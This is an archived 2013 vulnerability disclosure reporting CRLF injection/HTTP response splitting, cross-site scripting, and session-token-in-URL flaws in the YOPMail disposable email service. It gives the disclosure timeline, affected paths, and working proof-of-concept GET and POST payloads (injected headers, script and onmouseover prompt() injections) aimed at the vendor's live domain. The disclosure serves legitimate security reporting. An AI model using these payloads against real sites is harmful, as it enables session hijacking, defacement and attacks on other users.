exploit the possibilities

YOPMail XSS / Injection / HTTP Response Splitting

YOPMail XSS / Injection / HTTP Response Splitting
Posted Jun 28, 2013
Authored by Juan Carlos Garcia

YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.

tags | exploit, web, vulnerability, xss
MD5 | a5d9881d634167e06e2db886f4cca8b3

YOPMail XSS / Injection / HTTP Response Splitting

Change Mirror Download
YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL
==================================================================================================================================================


Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / Not Response
2013-06-28: Full Disclosure


I-VULNERABILITIES
======================

#Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL /

#Vendor:http://www.yopmail.com

#Author:Juan Carlos García (@secnight)

#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight


II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days.
It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are

downloadable. There are alternate domains.

Domains

@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.


III-PROOF OF CONCEPT
======================

CRLF INJECTION-HTTP RESPONSE SPLITING
______________________________________

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers

are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user

defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks

Attacks
-------

http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717


Multiple CROSS SITE SCRIPTING
_______________________________

The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a

manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------

Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS..

Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php

Method GET
----------

http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec

http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec

http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid

http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E

http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E

http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E

http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E

http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E

http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------

http://www.yopmail.com:80/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-

1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-

dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-

7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt

%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-

0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


SESSION TOKEN IN URL
____________________

This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL.

URLs could be logged or leaked via the Referer header.

Affected items
--------------

/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)

Examples

Method GET
----------

http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&

http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst



IV. CREDITS
-------------------------

This vulnerabilities has been discovered
by Juan Carlos García(@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close